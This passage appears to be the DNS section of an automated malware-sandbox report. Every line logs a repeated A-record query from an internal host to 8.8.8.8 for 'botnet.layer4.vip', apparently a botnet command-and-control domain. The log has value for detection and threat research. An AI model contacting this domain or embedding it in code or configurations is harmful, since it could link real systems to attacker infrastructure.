                                  Apr 9, 2023 03:32:03.192748070 CEST192.168.2.238.8.8.80xbd26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.208817005 CEST192.168.2.238.8.8.80xbd26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.233206034 CEST192.168.2.238.8.8.80xbd26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.249144077 CEST192.168.2.238.8.8.80xbd26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.265213013 CEST192.168.2.238.8.8.80xd784Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.289711952 CEST192.168.2.238.8.8.80xd784Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.305346012 CEST192.168.2.238.8.8.80xd784Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.321306944 CEST192.168.2.238.8.8.80xd784Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.345741034 CEST192.168.2.238.8.8.80xd784Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.371310949 CEST192.168.2.238.8.8.80x146aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.387274981 CEST192.168.2.238.8.8.80x146aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.403279066 CEST192.168.2.238.8.8.80x146aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.427493095 CEST192.168.2.238.8.8.80x146aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.443658113 CEST192.168.2.238.8.8.80x146aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.459887981 CEST192.168.2.238.8.8.80xe8a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.484469891 CEST192.168.2.238.8.8.80xe8a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.508606911 CEST192.168.2.238.8.8.80xe8a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.533123970 CEST192.168.2.238.8.8.80xe8a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.549036980 CEST192.168.2.238.8.8.80xe8a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.565063953 CEST192.168.2.238.8.8.80x2de7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.590518951 CEST192.168.2.238.8.8.80x2de7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.606139898 CEST192.168.2.238.8.8.80x2de7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.630589008 CEST192.168.2.238.8.8.80x2de7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.654906988 CEST192.168.2.238.8.8.80x2de7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.679032087 CEST192.168.2.238.8.8.80x40a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.703442097 CEST192.168.2.238.8.8.80x40a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.718951941 CEST192.168.2.238.8.8.80x40a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.734780073 CEST192.168.2.238.8.8.80x40a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.750613928 CEST192.168.2.238.8.8.80x40a7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.766551018 CEST192.168.2.238.8.8.80xc0beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.792032003 CEST192.168.2.238.8.8.80xc0beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.807581902 CEST192.168.2.238.8.8.80xc0beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.831620932 CEST192.168.2.238.8.8.80xc0beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.847104073 CEST192.168.2.238.8.8.80xc0beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.862822056 CEST192.168.2.238.8.8.80x1104Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.887105942 CEST192.168.2.238.8.8.80x1104Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.911308050 CEST192.168.2.238.8.8.80x1104Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.935619116 CEST192.168.2.238.8.8.80x1104Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.951493025 CEST192.168.2.238.8.8.80x1104Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.976046085 CEST192.168.2.238.8.8.80x8d8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:03.991883039 CEST192.168.2.238.8.8.80x8d8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.016474009 CEST192.168.2.238.8.8.80x8d8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.040976048 CEST192.168.2.238.8.8.80x8d8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.065134048 CEST192.168.2.238.8.8.80x8d8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.089639902 CEST192.168.2.238.8.8.80x3a96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.105204105 CEST192.168.2.238.8.8.80x3a96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.129647017 CEST192.168.2.238.8.8.80x3a96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.153829098 CEST192.168.2.238.8.8.80x3a96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.178334951 CEST192.168.2.238.8.8.80x3a96Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.202867985 CEST192.168.2.238.8.8.80x437bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.227485895 CEST192.168.2.238.8.8.80x437bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.251909971 CEST192.168.2.238.8.8.80x437bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.267406940 CEST192.168.2.238.8.8.80x437bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.283179045 CEST192.168.2.238.8.8.80x437bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.307733059 CEST192.168.2.238.8.8.80x658fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.323653936 CEST192.168.2.238.8.8.80x658fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.339245081 CEST192.168.2.238.8.8.80x658fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.363774061 CEST192.168.2.238.8.8.80x658fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.388293982 CEST192.168.2.238.8.8.80x658fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.404259920 CEST192.168.2.238.8.8.80x838fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.428365946 CEST192.168.2.238.8.8.80x838fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.443895102 CEST192.168.2.238.8.8.80x838fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.459798098 CEST192.168.2.238.8.8.80x838fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.475346088 CEST192.168.2.238.8.8.80x838fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.499921083 CEST192.168.2.238.8.8.80x8d97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.515455008 CEST192.168.2.238.8.8.80x8d97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.531307936 CEST192.168.2.238.8.8.80x8d97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.546987057 CEST192.168.2.238.8.8.80x8d97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.562567949 CEST192.168.2.238.8.8.80x8d97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.586843967 CEST192.168.2.238.8.8.80x3d6eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.602766037 CEST192.168.2.238.8.8.80x3d6eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.618364096 CEST192.168.2.238.8.8.80x3d6eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.633946896 CEST192.168.2.238.8.8.80x3d6eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.649382114 CEST192.168.2.238.8.8.80x3d6eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.664926052 CEST192.168.2.238.8.8.80xf261Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.689344883 CEST192.168.2.238.8.8.80xf261Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.710129976 CEST192.168.2.238.8.8.80xf261Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.725611925 CEST192.168.2.238.8.8.80xf261Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.741452932 CEST192.168.2.238.8.8.80xf261Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.765491009 CEST192.168.2.238.8.8.80x9158Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.781311035 CEST192.168.2.238.8.8.80x9158Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.805577040 CEST192.168.2.238.8.8.80x9158Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.821367025 CEST192.168.2.238.8.8.80x9158Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.836961985 CEST192.168.2.238.8.8.80x9158Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.852883101 CEST192.168.2.238.8.8.80xe40aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.877016068 CEST192.168.2.238.8.8.80xe40aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.901226044 CEST192.168.2.238.8.8.80xe40aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.925313950 CEST192.168.2.238.8.8.80xe40aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.940850973 CEST192.168.2.238.8.8.80xe40aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.956418991 CEST192.168.2.238.8.8.80x5772Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.972429037 CEST192.168.2.238.8.8.80x5772Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:04.987998009 CEST192.168.2.238.8.8.80x5772Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.012386084 CEST192.168.2.238.8.8.80x5772Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.036829948 CEST192.168.2.238.8.8.80x5772Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.061408043 CEST192.168.2.238.8.8.80xbaa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.076944113 CEST192.168.2.238.8.8.80xbaa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.092504025 CEST192.168.2.238.8.8.80xbaa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.116863966 CEST192.168.2.238.8.8.80xbaa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.140973091 CEST192.168.2.238.8.8.80xbaa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.165069103 CEST192.168.2.238.8.8.80x7c62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.189126968 CEST192.168.2.238.8.8.80x7c62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.213494062 CEST192.168.2.238.8.8.80x7c62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.238012075 CEST192.168.2.238.8.8.80x7c62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.253556013 CEST192.168.2.238.8.8.80x7c62Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.277993917 CEST192.168.2.238.8.8.80x7c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.302067041 CEST192.168.2.238.8.8.80x7c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.326248884 CEST192.168.2.238.8.8.80x7c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.341844082 CEST192.168.2.238.8.8.80x7c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.357758045 CEST192.168.2.238.8.8.80x7c61Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.382373095 CEST192.168.2.238.8.8.80x6c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.398442030 CEST192.168.2.238.8.8.80x6c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.422607899 CEST192.168.2.238.8.8.80x6c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.438335896 CEST192.168.2.238.8.8.80x6c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.463032961 CEST192.168.2.238.8.8.80x6c58Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.478837967 CEST192.168.2.238.8.8.80x9a1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.494472980 CEST192.168.2.238.8.8.80x9a1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.510051012 CEST192.168.2.238.8.8.80x9a1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.526083946 CEST192.168.2.238.8.8.80x9a1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.550534010 CEST192.168.2.238.8.8.80x9a1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.566575050 CEST192.168.2.238.8.8.80x7142Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.582129002 CEST192.168.2.238.8.8.80x7142Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.597734928 CEST192.168.2.238.8.8.80x7142Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.613708019 CEST192.168.2.238.8.8.80x7142Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.629713058 CEST192.168.2.238.8.8.80x7142Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.654390097 CEST192.168.2.238.8.8.80x1ac5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.670448065 CEST192.168.2.238.8.8.80x1ac5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.686388016 CEST192.168.2.238.8.8.80x1ac5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.702357054 CEST192.168.2.238.8.8.80x1ac5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.717911959 CEST192.168.2.238.8.8.80x1ac5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.733680010 CEST192.168.2.238.8.8.80x44dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.749723911 CEST192.168.2.238.8.8.80x44dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.773799896 CEST192.168.2.238.8.8.80x44dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.798141003 CEST192.168.2.238.8.8.80x44dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.813651085 CEST192.168.2.238.8.8.80x44dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.837960958 CEST192.168.2.238.8.8.80xdd84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.862155914 CEST192.168.2.238.8.8.80xdd84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.878011942 CEST192.168.2.238.8.8.80xdd84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.893579960 CEST192.168.2.238.8.8.80xdd84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.909128904 CEST192.168.2.238.8.8.80xdd84Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.933815002 CEST192.168.2.238.8.8.80x33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.959052086 CEST192.168.2.238.8.8.80x33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:05.983195066 CEST192.168.2.238.8.8.80x33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.007605076 CEST192.168.2.238.8.8.80x33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.023448944 CEST192.168.2.238.8.8.80x33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.047673941 CEST192.168.2.238.8.8.80xa554Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.072160006 CEST192.168.2.238.8.8.80xa554Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.087960958 CEST192.168.2.238.8.8.80xa554Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.103790998 CEST192.168.2.238.8.8.80xa554Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.119694948 CEST192.168.2.238.8.8.80xa554Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.144083023 CEST192.168.2.238.8.8.80x6927Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.159704924 CEST192.168.2.238.8.8.80x6927Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.183816910 CEST192.168.2.238.8.8.80x6927Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.199718952 CEST192.168.2.238.8.8.80x6927Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.223918915 CEST192.168.2.238.8.8.80x6927Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.239976883 CEST192.168.2.238.8.8.80xbb2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.255999088 CEST192.168.2.238.8.8.80xbb2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.272047043 CEST192.168.2.238.8.8.80xbb2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.287959099 CEST192.168.2.238.8.8.80xbb2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.312470913 CEST192.168.2.238.8.8.80xbb2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.328325033 CEST192.168.2.238.8.8.80xc44cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.352416039 CEST192.168.2.238.8.8.80xc44cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.368017912 CEST192.168.2.238.8.8.80xc44cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.384243965 CEST192.168.2.238.8.8.80xc44cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.408912897 CEST192.168.2.238.8.8.80xc44cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.433933020 CEST192.168.2.238.8.8.80xd19bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.458676100 CEST192.168.2.238.8.8.80xd19bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.483366966 CEST192.168.2.238.8.8.80xd19bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.508327961 CEST192.168.2.238.8.8.80xd19bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.524542093 CEST192.168.2.238.8.8.80xd19bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.549680948 CEST192.168.2.238.8.8.80xee9bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.566028118 CEST192.168.2.238.8.8.80xee9bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.581710100 CEST192.168.2.238.8.8.80xee9bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.597801924 CEST192.168.2.238.8.8.80xee9bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.614072084 CEST192.168.2.238.8.8.80xee9bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.629663944 CEST192.168.2.238.8.8.80xb02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.645514965 CEST192.168.2.238.8.8.80xb02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.661360979 CEST192.168.2.238.8.8.80xb02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.685882092 CEST192.168.2.238.8.8.80xb02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.701500893 CEST192.168.2.238.8.8.80xb02Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.726085901 CEST192.168.2.238.8.8.80xb625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.742124081 CEST192.168.2.238.8.8.80xb625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.758011103 CEST192.168.2.238.8.8.80xb625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.782838106 CEST192.168.2.238.8.8.80xb625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.807966948 CEST192.168.2.238.8.8.80xb625Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.832175970 CEST192.168.2.238.8.8.80xd49dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.857204914 CEST192.168.2.238.8.8.80xd49dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.873481989 CEST192.168.2.238.8.8.80xd49dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.889096022 CEST192.168.2.238.8.8.80xd49dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.905256987 CEST192.168.2.238.8.8.80xd49dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.930318117 CEST192.168.2.238.8.8.80x768fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.954400063 CEST192.168.2.238.8.8.80x768fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.978929043 CEST192.168.2.238.8.8.80x768fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:06.994940996 CEST192.168.2.238.8.8.80x768fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.010596991 CEST192.168.2.238.8.8.80x768fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.027082920 CEST192.168.2.238.8.8.80xafa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.043025017 CEST192.168.2.238.8.8.80xafa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.067095995 CEST192.168.2.238.8.8.80xafa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:07.091340065 CEST192.168.2.238.8.8.80xafa0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
